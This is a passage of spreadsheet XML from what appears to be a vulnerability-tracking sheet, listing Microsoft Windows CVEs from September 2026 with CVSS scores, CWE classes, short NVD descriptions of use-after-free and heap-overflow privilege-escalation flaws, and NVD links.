      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q832" s="5" t="inlineStr"/>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S832" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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33" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q833" s="5" t="inlineStr"/>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S833" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q834" s="5" t="inlineStr"/>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S834" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K835" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q835" s="5" t="inlineStr"/>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S835" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69272</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q836" s="5" t="inlineStr"/>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S836" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69274</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P837" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q837" s="5" t="inlineStr"/>
      <c r="R837" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S837" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="D838" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F838" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I838" s="5" t="inlineStr"/>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr"/>
      <c r="L838" s="5" t="inlineStr"/>
      <c r="M838" s="5" t="inlineStr"/>
      <c r="N838" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P838" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q838" s="5" t="inlineStr"/>
      <c r="R838" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S838" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69305</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q839" s="5" t="inlineStr"/>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S839" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q840" s="5" t="inlineStr"/>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S840" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr"/>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q841" s="5" t="inlineStr"/>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S841" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69336</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr"/>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q842" s="5" t="inlineStr"/>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S842" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69337</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q843" s="5" t="inlineStr"/>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S843" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69338</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q844" s="5" t="inlineStr"/>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S844" s="5" t="inlineStr">
        <is>
          <t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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45" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q845" s="5" t="inlineStr"/>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S845" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69357</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q846" s="5" t="inlineStr"/>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S846" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69358</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q847" s="5" t="inlineStr"/>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S847" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69364</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q848" s="5" t="inlineStr"/>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S848" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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49" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q849" s="5" t="inlineStr"/>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S849" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
